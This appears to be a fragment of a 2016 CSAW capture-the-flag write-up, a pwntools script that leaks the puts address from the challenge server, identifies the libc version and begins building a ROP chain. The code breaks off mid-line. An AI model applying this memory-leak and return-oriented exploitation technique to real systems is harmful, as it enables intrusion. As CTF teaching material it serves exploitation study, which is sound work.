2016 CSAW CTF Tutorial
St1tch
from pwn import * import stitch local = False if local : s = remote('localhost', 8005) else : s = remote('pwn.chal.csaw.io', 8002) raw_input() def solve() : p.status('leak puts addr') s.recvuntil('>') sleep(1) s.sendline('1') puts = int(s.recvuntil('\n').split(':')[1].strip('0x'), 16) + 1280 libc = stitch.find_libc({'puts':hex(puts)[-3:]})[0] offset = puts - libc['puts'] poprdi = offset + libc['..